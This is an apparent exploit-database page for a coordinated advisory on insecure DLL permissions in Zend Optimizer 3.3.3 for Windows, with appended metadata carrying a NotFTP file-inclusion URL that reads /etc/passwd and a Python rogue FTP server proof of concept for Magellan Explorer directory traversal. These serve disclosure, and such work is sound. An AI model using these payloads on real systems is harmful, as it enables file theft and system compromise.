Search...

Zend Optimizer 3.3.3 (Windows) Insecure Permissions

2012-04-04T00:00:00

ID 1337DAY-ID-17951
Type zdt
Reporter LiquidWorm
Modified 2012-04-04T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            Zend Optimizer 3.3.3 (Windows) Insecure Permissions


Vendor: Zend Technologies Ltd.
Product web page: http://www.zend.com

Affected version: 3.3.3* and 3.3.0*

* Note: The patch did not change the version number of the affected
product, so the updated version is still 3.3.3, but with proper permissions.

Summary: Zend Optimizer is a free application that runs the files
encoded using Zend Guard and enhances the overall performance of
your PHP applications.

Desc: The Zend Optimizer package for Windows is vulnerable to an
elevation of privileges vulnerability which can be used by a simple
user that can change the library file with a binary of choice. The
vulnerability exist due to the improper permissions, with the 'F' flag
(full control) for the 'Everyone' group, for the 'ZendExtensionManager.dll'
library file and 'ZendOptimizer.dll' which are bundled with the Zend
Optimizer (Runtime for PHP 5.2 and earlier) installation package.

Tested on: Microsoft Windows XP Professional SP3 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Vendor status:

[01.02.2012] Vulnerability discovered.
[23.02.2012] Contact with the vendor.
[23.02.2012] Vendor responds asking for details.
[24.02.2012] Sent detailed information to the vendor.
[24.02.2012] Vendor assigns appropriate team for coordination.
[27.02.2012] Vendor is analyzing the issue, working on a fix.
[27.02.2012] Asked vendor for confirmation and scheduled patch release date.
[28.02.2012] Vendor replies with confirmation of the issue.
[05.03.2012] Asked vendor for status update.
[06.03.2012] Vendor created fix for the issue, promising patch release date.
[07.03.2012] Sent coordination details to the vendor.
[14.03.2012] Asked vendor for status update.
[14.03.2012] Vendor replies.
[21.03.2012] Sent advisory release information to the vendor.
[21.03.2012] Vendor extends the patch release date.
[29.03.2012] Vendor publishes new version to address this issue.
[03.04.2012] Coordinated public security advisory released.



Advisory ID: ZSL-2012-5083
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5083.php

Zend Advisory: http://static.zend.com/topics/Zend-Optimizer-3.3.3-Release-Notes-V2.txt
               http://www.zend.com/en/products/guard/downloads



01.02.2012


---

C:\Program Files\Zend\ZendOptimizer-3.3.0\lib&gt;cacls ZendExtensionManager.dll
C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\ZendExtensionManager.dll Everyone:F
                                                                       BUILTIN\Users:R
                                                                       BUILTIN\Power Users:C
                                                                       BUILTIN\Administrators:F
                                                                       NT AUTHORITY\SYSTEM:F
                                                                       TESTPC\TESTUSER:F


C:\Program Files\Zend\ZendOptimizer-3.3.0\lib&gt;cd Optimizer-3.3.0\php-5.2.x

C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x&gt;cacls ZendOptimizer.dll
C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll Everyone:F
                                                                                          BUILTIN\Users:R
                                                                                          BUILTIN\Power Users:C
                                                                                          BUILTIN\Administrators:F
                                                                                          NT AUTHORITY\SYSTEM:F
                                                                                          TESTPC\TESTUSER:F


C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x&gt;

---



#  0day.today [2018-01-03]  #

JSON Vulners Source

Initial Source

{"published": "2012-04-04T00:00:00", "id": "1337DAY-ID-17951", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:31:23", "bulletin": {"published": "2012-04-04T00:00:00", "id": "1337DAY-ID-17951", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.0, "modified": "2016-04-20T01:31:23"}}, "hash": "364614809f2157a29ea1bce951fbd0f6129862d7795ab4f6773a829117d23476", "description": "Exploit for windows platform in category local exploits", "type": "zdt", "lastseen": "2016-04-20T01:31:23", "edition": 1, "title": "Zend Optimizer 3.3.3 (Windows) Insecure Permissions", "href": "http://0day.today/exploit/description/17951", "modified": "2012-04-04T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/17951", "references": [], "reporter": "LiquidWorm", "sourceData": "Zend Optimizer 3.3.3 (Windows) Insecure Permissions\r\n\r\n\r\nVendor: Zend Technologies Ltd.\r\nProduct web page: http://www.zend.com\r\n\r\nAffected version: 3.3.3* and 3.3.0*\r\n\r\n* Note: The patch did not change the version number of the affected\r\nproduct, so the updated version is still 3.3.3, but with proper permissions.\r\n\r\nSummary: Zend Optimizer is a free application that runs the files\r\nencoded using Zend Guard and enhances the overall performance of\r\nyour PHP applications.\r\n\r\nDesc: The Zend Optimizer package for Windows is vulnerable to an\r\nelevation of privileges vulnerability which can be used by a simple\r\nuser that can change the library file with a binary of choice. The\r\nvulnerability exist due to the improper permissions, with the 'F' flag\r\n(full control) for the 'Everyone' group, for the 'ZendExtensionManager.dll'\r\nlibrary file and 'ZendOptimizer.dll' which are bundled with the Zend\r\nOptimizer (Runtime for PHP 5.2 and earlier) installation package.\r\n\r\nTested on: Microsoft Windows XP Professional SP3 (EN)\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nVendor status:\r\n\r\n[01.02.2012] Vulnerability discovered.\r\n[23.02.2012] Contact with the vendor.\r\n[23.02.2012] Vendor responds asking for details.\r\n[24.02.2012] Sent detailed information to the vendor.\r\n[24.02.2012] Vendor assigns appropriate team for coordination.\r\n[27.02.2012] Vendor is analyzing the issue, working on a fix.\r\n[27.02.2012] Asked vendor for confirmation and scheduled patch release date.\r\n[28.02.2012] Vendor replies with confirmation of the issue.\r\n[05.03.2012] Asked vendor for status update.\r\n[06.03.2012] Vendor created fix for the issue, promising patch release date.\r\n[07.03.2012] Sent coordination details to the vendor.\r\n[14.03.2012] Asked vendor for status update.\r\n[14.03.2012] Vendor replies.\r\n[21.03.2012] Sent advisory release information to the vendor.\r\n[21.03.2012] Vendor extends the patch release date.\r\n[29.03.2012] Vendor publishes new version to address this issue.\r\n[03.04.2012] Coordinated public security advisory released.\r\n\r\n\r\n\r\nAdvisory ID: ZSL-2012-5083\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5083.php\r\n\r\nZend Advisory: http://static.zend.com/topics/Zend-Optimizer-3.3.3-Release-Notes-V2.txt\r\n http://www.zend.com/en/products/guard/downloads\r\n\r\n\r\n\r\n01.02.2012\r\n\r\n\r\n---\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib>cacls ZendExtensionManager.dll\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\ZendExtensionManager.dll Everyone:F\r\n BUILTIN\\Users:R\r\n BUILTIN\\Power Users:C\r\n BUILTIN\\Administrators:F\r\n NT AUTHORITY\\SYSTEM:F\r\n TESTPC\\TESTUSER:F\r\n\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib>cd Optimizer-3.3.0\\php-5.2.x\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\Optimizer-3.3.0\\php-5.2.x>cacls ZendOptimizer.dll\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\Optimizer-3.3.0\\php-5.2.x\\ZendOptimizer.dll Everyone:F\r\n BUILTIN\\Users:R\r\n BUILTIN\\Power Users:C\r\n BUILTIN\\Administrators:F\r\n NT AUTHORITY\\SYSTEM:F\r\n TESTPC\\TESTUSER:F\r\n\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\Optimizer-3.3.0\\php-5.2.x>\r\n\r\n---\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "caf3146a0321319b77bb5a4b8df50353", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "fa50b16abf756a36669c7d468a03e011", "key": "sourceData"}, {"hash": "7b5a0e810ee22f96e22a367a2b520b91", "key": "sourceHref"}, {"hash": "7505c0746ddbbcecfcf8857f2822fe7a", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "97cb93618153949f7a9f8f3a05794670", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "91aad38014ecd6c9585176f5bacd2246", "key": "reporter"}, {"hash": "caf3146a0321319b77bb5a4b8df50353", "key": "published"}], "objectVersion": "1.0"}}], "description": "Exploit for windows platform in category local exploits", "hash": "52c70efa52f9695467db7638482f2b2db35a27ce570267bf72bde184a77ede3d", "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-5083"]}], "modified": "2018-01-03T13:08:17"}, "vulnersScore": 7.2}, "type": "zdt", "lastseen": "2018-01-03T13:08:17", "edition": 2, "title": "Zend Optimizer 3.3.3 (Windows) Insecure Permissions", "href": "https://0day.today/exploit/description/17951", "modified": "2012-04-04T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/17951", "references": [], "reporter": "LiquidWorm", "sourceData": "Zend Optimizer 3.3.3 (Windows) Insecure Permissions\r\n\r\n\r\nVendor: Zend Technologies Ltd.\r\nProduct web page: http://www.zend.com\r\n\r\nAffected version: 3.3.3* and 3.3.0*\r\n\r\n* Note: The patch did not change the version number of the affected\r\nproduct, so the updated version is still 3.3.3, but with proper permissions.\r\n\r\nSummary: Zend Optimizer is a free application that runs the files\r\nencoded using Zend Guard and enhances the overall performance of\r\nyour PHP applications.\r\n\r\nDesc: The Zend Optimizer package for Windows is vulnerable to an\r\nelevation of privileges vulnerability which can be used by a simple\r\nuser that can change the library file with a binary of choice. The\r\nvulnerability exist due to the improper permissions, with the 'F' flag\r\n(full control) for the 'Everyone' group, for the 'ZendExtensionManager.dll'\r\nlibrary file and 'ZendOptimizer.dll' which are bundled with the Zend\r\nOptimizer (Runtime for PHP 5.2 and earlier) installation package.\r\n\r\nTested on: Microsoft Windows XP Professional SP3 (EN)\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nVendor status:\r\n\r\n[01.02.2012] Vulnerability discovered.\r\n[23.02.2012] Contact with the vendor.\r\n[23.02.2012] Vendor responds asking for details.\r\n[24.02.2012] Sent detailed information to the vendor.\r\n[24.02.2012] Vendor assigns appropriate team for coordination.\r\n[27.02.2012] Vendor is analyzing the issue, working on a fix.\r\n[27.02.2012] Asked vendor for confirmation and scheduled patch release date.\r\n[28.02.2012] Vendor replies with confirmation of the issue.\r\n[05.03.2012] Asked vendor for status update.\r\n[06.03.2012] Vendor created fix for the issue, promising patch release date.\r\n[07.03.2012] Sent coordination details to the vendor.\r\n[14.03.2012] Asked vendor for status update.\r\n[14.03.2012] Vendor replies.\r\n[21.03.2012] Sent advisory release information to the vendor.\r\n[21.03.2012] Vendor extends the patch release date.\r\n[29.03.2012] Vendor publishes new version to address this issue.\r\n[03.04.2012] Coordinated public security advisory released.\r\n\r\n\r\n\r\nAdvisory ID: ZSL-2012-5083\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5083.php\r\n\r\nZend Advisory: http://static.zend.com/topics/Zend-Optimizer-3.3.3-Release-Notes-V2.txt\r\n http://www.zend.com/en/products/guard/downloads\r\n\r\n\r\n\r\n01.02.2012\r\n\r\n\r\n---\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib>cacls ZendExtensionManager.dll\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\ZendExtensionManager.dll Everyone:F\r\n BUILTIN\\Users:R\r\n BUILTIN\\Power Users:C\r\n BUILTIN\\Administrators:F\r\n NT AUTHORITY\\SYSTEM:F\r\n TESTPC\\TESTUSER:F\r\n\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib>cd Optimizer-3.3.0\\php-5.2.x\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\Optimizer-3.3.0\\php-5.2.x>cacls ZendOptimizer.dll\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\Optimizer-3.3.0\\php-5.2.x\\ZendOptimizer.dll Everyone:F\r\n BUILTIN\\Users:R\r\n BUILTIN\\Power Users:C\r\n BUILTIN\\Administrators:F\r\n NT AUTHORITY\\SYSTEM:F\r\n TESTPC\\TESTUSER:F\r\n\r\n\r\nC:\\Program Files\\Zend\\ZendOptimizer-3.3.0\\lib\\Optimizer-3.3.0\\php-5.2.x>\r\n\r\n---\r\n\r\n\n\n# 0day.today [2018-01-03] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "428115348079cfe8d67ca2a956bd6f8c", "key": "href"}, {"hash": "caf3146a0321319b77bb5a4b8df50353", "key": "modified"}, {"hash": "caf3146a0321319b77bb5a4b8df50353", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "91aad38014ecd6c9585176f5bacd2246", "key": "reporter"}, {"hash": "f968ea1cc0af8875ea6f39f7180236a3", "key": "sourceData"}, {"hash": "699f2a6e0ae8486bd2a50b91aa9b52e5", "key": "sourceHref"}, {"hash": "97cb93618153949f7a9f8f3a05794670", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"zeroscience": [{"lastseen": "2019-03-20T18:09:32", "bulletinFamily": "exploit", "description": "Title: Zend Optimizer 3.3.3 (Windows) Insecure Permissions \nAdvisory ID: [ZSL-2012-5083](<ZSL-2012-5083.php>) \nType: Local \nImpact: Privilege Escalation \nRisk: (2/5) \nRelease Date: 03.04.2012 \n\n\n##### Summary\n\nZend Optimizer is a free application that runs the files encoded using Zend Guard and enhances the overall performance of your PHP applications. \n\n##### Description\n\nThe Zend Optimizer package for Windows is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the library file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (full control) for the 'Everyone' group, for the 'ZendExtensionManager.dll' library file and 'ZendOptimizer.dll' which are bundled with the Zend Optimizer (Runtime for PHP 5.2 and earlier) installation package. \n\n##### Vendor\n\nZend Technologies Ltd. - <http://www.zend.com>\n\n##### Affected Version\n\n3.3.3* and 3.3.0* \n \n***** Note: The patch did not change the version number of the affected product, so the updated version is still 3.3.3, but with proper permissions. \n\n##### Tested On\n\nMicrosoft Windows XP Professional SP3 (EN) \n\n##### Vendor Status\n\n[01.02.2012] Vulnerability discovered. \n[23.02.2012] Contact with the vendor. \n[23.02.2012] Vendor responds asking for details. \n[24.02.2012] Sent detailed information to the vendor. \n[24.02.2012] Vendor assigns appropriate team for coordination. \n[27.02.2012] Vendor is analyzing the issue, working on a fix. \n[27.02.2012] Asked vendor for confirmation and scheduled patch release date. \n[28.02.2012] Vendor replies with confirmation of the issue. \n[05.03.2012] Asked vendor for status update. \n[06.03.2012] Vendor created fix for the issue, promising patch release date. \n[07.03.2012] Sent coordination details to the vendor. \n[14.03.2012] Asked vendor for status update. \n[14.03.2012] Vendor replies. \n[21.03.2012] Sent advisory release information to the vendor. \n[21.03.2012] Vendor extends the patch release date. \n[29.03.2012] Vendor publishes new version to address this issue. \n[03.04.2012] Coordinated public security advisory released. \n\n##### PoC\n\n[zendoptimizer_iperms.txt](<../../codes/zendoptimizer_iperms.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <http://static.zend.com/topics/Zend-Optimizer-3.3.3-Release-Notes-V2.txt> \n[2] <http://www.zend.com/en/products/guard/downloads> \n[3] <http://www.securityfocus.com/bid/52866> \n[4] <http://packetstormsecurity.org/files/111530> \n[5] <http://cxsecurity.com/issue/WLB-2012040044> \n[6] <http://secunia.com/advisories/48642/> \n[7] <http://www.osvdb.org/show/osvdb/80935> \n[8] <http://xforce.iss.net/xforce/xfdb/74580>\n\n##### Changelog\n\n[03.04.2012] - Initial release \n[04.04.2012] - Added reference [4] and [5] \n[06.04.2012] - Added reference [6] and [7] \n[20.04.2012] - Added reference [8] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2012-04-03T00:00:00", "published": "2012-04-03T00:00:00", "id": "ZSL-2012-5083", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2012-5083.php", "title": "Zend Optimizer 3.3.3 (Windows) Insecure Permissions", "type": "zeroscience", "sourceData": "REQUEST LIMIT REACHED", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/zendoptimizer_iperms.txt"}], "zdt": [{"lastseen": "2018-03-01T03:36:07", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-04-21T00:00:00", "published": "2009-04-21T00:00:00", "id": "1337DAY-ID-5083", "href": "https://0day.today/exploit/description/5083", "type": "zdt", "title": "NotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability", "sourceData": "=========================================================\r\nNotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability\r\n=========================================================\r\n\r\n\r\nNotFTP 1.3.1 => Local file include\r\nhttp://sourceforge.net/projects/notftp/\r\n\r\n\r\nAuthor: Kacper\r\n\r\nDC++ Hub address: bluber-hub.no-ip.biz:2008\r\n\r\nVuln:\r\n\r\nFile config.php:\r\n\r\n#########################################################################\r\n# This is where we decide what language to use. Don't mess with this\r\n# either.\r\n#########################################################################\r\n\r\nif (isset($newlang))\r\n{\r\n require_once(\"lib/lang/\".$languages[$newlang][\"file\"]);\r\n}\r\nelseif (isset($_COOKIE[\"notftplang\"]))\r\n{\r\n require_once(\"lib/lang/\".$languages[$_COOKIE[\"notftplang\"]][\"file\"]);\r\n}\r\nelse\r\n{\r\n require_once(\"lib/lang/\".$languages[DEFAULTLANG][\"file\"]);\r\n}\r\n\r\n# NotFTP version. Changing this would be silly. So don't.\r\n\r\nPoC:\r\n\r\nhttp://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd\r\n\r\nThe End\r\n\r\n========= \r\n\r\n\r\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5083"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:26", "bulletinFamily": "software", "description": "Directory traversal with filename obtained from FTP server.", "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "id": "SECURITYVULNS:VULN:8125", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8125", "title": "Total Commander / Unreal Commander / Magellan Explorer directory traversal", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "description": "HISPASEC\r\nSecurity Advisory\r\nhttp://blog.hispasec.com/lab/\r\n\r\nName : 2K7SEPT6 Magellan Explorer 3.32 build 2305 Remote FTP\r\nClient Directory Traversal\r\nClass : Remote Directory Traversal\r\nThreat level : HIGH\r\nDiscovered : 2007-08-14\r\nPublished : 2007-09-06\r\nCredit : Gynvael Coldwind\r\nVulnerable : 3.32 built 2305 and prior, other versions may be affected\r\n\r\n== Abstract ==\r\n\r\nEnriva Development Magellan Explorer is an award winning Windows file\r\nexplorer with a\r\nbuilt-in support for FTP protocol.\r\n\r\nMagellan Explorer fails to correctly handle file names on remote FTP servers\r\nwhile downloading them to a local drive. This may lead to a directory traversal\r\nif a malformed file name contains relative path.\r\nSuccessful exploitation may lead to a full scale system compromise.\r\n\r\n== Details ==\r\n\r\nThe FTP feature fails to correctly check the name of a file that is to be\r\ndownloaded. This filename can contain backslashes, slashes and dots, and these\r\ndots and backslashes will be used as a part of a local file name.\r\nAn example file list sent from the FTP server can look like this:\r\n-rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28\r\nst\..\..\..\..\..\BackSlashPoC\r\n-rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28\r\nst/../../../../../SlashPoC\r\nWhen the user chooses to download the file (or a directory in which this file\r\nexists), the Magellan Explorer will try to create the file on a local harddrive\r\nusing the dots and backslashes as a part of a name.\r\nSince more then enough \..\..\ will just bring the path to the disk root, the\r\nattacker can choose any location on the disk to write the file to. The file can\r\nfor example overwrite a critical system file, or create a file in the Autostart\r\nfolder.\r\n\r\nSee Proof of Concept exploit at the bottom of this advisory.\r\n\r\n== Vendor status and solution ==\r\n\r\nThe vendor has been informed and has released a new version (7.02) with this\r\nissue being fixed.\r\nIt is advised to upgrade Total Commander to the newest version availible.\r\n\r\n== Proof of Concept ==\r\n# python localhost ftp server\r\n# by Gynvael Coldwind\r\n\r\nimport socket\r\n\r\nTransferSock = 0\r\n\r\ndef sendDirList (sock):\r\n(DataSock, Address) = TransferSock.accept()\r\nprint "sendDirList: TransferSock accepted a connection"\r\nsock.send("150 Opening ASCII mode data connection for file list\r\n");\r\nDataSock.send("-rwxr-xr-x 2 ftp ftp 4096 Aug 1\r\n02:28 st\\..\\..\\..\\..\\..\\BackSlashPoC\n" +\r\n"-rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28\r\nst/../../../../../../SlashPoC\n");\r\nDataSock.close()\r\nsock.send("226 Transfer complete.\r\n");\r\nprint "sendDirList: Transfer complete\r\n"\r\n\r\ndef sendFile (sock):\r\n(DataSock, Address) = TransferSock.accept()\r\nprint "sendDirList: TransferSock accepted a connection"\r\nsock.send("150 Opening BINARY mode data connection for sth (5 bytes)\r\n");\r\nDataSock.send("Proof of Concept - Remote FTP Client directory\r\ntraversal vulnerability (G.C. - Hispasec)");\r\nDataSock.close()\r\nsock.send("226 Transfer complete.\r\n");\r\nprint "sendDirList: Transfer complete\r\n"\r\n\r\ndef handleUSER (sock, cmd, argz): sock.send("331 Password required for\r\nuser\r\n")\r\ndef handlePASS (sock, cmd, argz): sock.send("230 User logged in.\r\n")\r\ndef handleSYST (sock, cmd, argz): sock.send("215 UNIX Type: L8\r\n")\r\ndef handleFEAT (sock, cmd, argz): sock.send("211-Features:\r\n\r\nMDTM\r\n REST STREAM\r\n211 End\r\n");\r\ndef handleTYPE (sock, cmd, argz): sock.send("200 Type set to " + argz + "\r\n");\r\ndef handlePASV (sock, cmd, argz): sock.send("227 Entering Passive Mode\r\n(127,0,0,1,10,10)\r\n");\r\ndef handlePWD (sock, cmd, argz): sock.send("257 \"/ProofOfConcept\" is\r\ncurrent directory.\r\n")\r\ndef handleLIST (sock, cmd, argz): sendDirList(sock)\r\ndef handleQUIT (sock, cmd, argz):\r\nsock.send("Bye.\r\n")\r\nsock.close()\r\n\r\ndef handleRETR (sock, cmd, argz):\r\nif argz == "/":\r\nsendDirList(sock)\r\nelse:\r\nsendFile(sock)\r\n\r\ndef unknown (sock, cmd, argz): sock.send("550 " + cmd + ": Operation\r\nnot permitted\r\n")\r\n\r\nhandlers = {\r\n'USER': handleUSER,\r\n'PASS': handlePASS,\r\n'SYST': handleSYST,\r\n'FEAT': handleFEAT,\r\n'TYPE': handleTYPE,\r\n'PASV': handlePASV,\r\n'PWD': handlePWD,\r\n'LIST': handleLIST,\r\n'QUIT': handleQUIT,\r\n'RETR': handleRETR\r\n}\r\n\r\nControlSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nControlSock.bind(("127.0.0.1", 2021))\r\nControlSock.listen(1)\r\n\r\nTransferSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nTransferSock.bind(("127.0.0.1", 10 * 256 + 10))\r\nTransferSock.listen(10)\r\n\r\n# Control Sock loop\r\n(ClientSock, Address) = ControlSock.accept()\r\nClientSock.send("220 PoCFTPD 1.2.3.4 Server ready.\r\n");\r\nend = 0\r\n\r\nwhile not end:\r\ncmd = ClientSock.recv(1024)\r\nprint "Debug: recv -> " + cmd.strip()\r\ncommand = (cmd[0:4]).strip()\r\nargz = ((cmd.strip())[5:]).strip()\r\nhandlers.get(command, unknown)(ClientSock, command, argz)\r\n\r\n== Disclaimer ==\r\nThis document and all the information it contains is provided "as is",\r\nwithout any warranty. Hispasec Sistemas is not responsible for the\r\nmisuse of the information provided in this advisory. The advisory is\r\nprovided for educational purposes only.\r\n\r\nPermission is hereby granted to redistribute this advisory, providing\r\nthat no changes are made and that the copyright notices and\r\ndisclaimers remain intact.\r\n\r\nCopyright (C) 2007 Hispasec Sistemas.\r\n\r\n-- \r\nGynvael Coldwind\r\nmailto: gynvael AT vexillium DOT org\r\nmailto: michael AT hispasec DOT com\r\n", "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "id": "SECURITYVULNS:DOC:17951", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17951", "title": "[HISPASEC] 2K7SEPT6 Magellan Explorer 3.32 build 2305 Remote FTP Client Directory Traversal", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}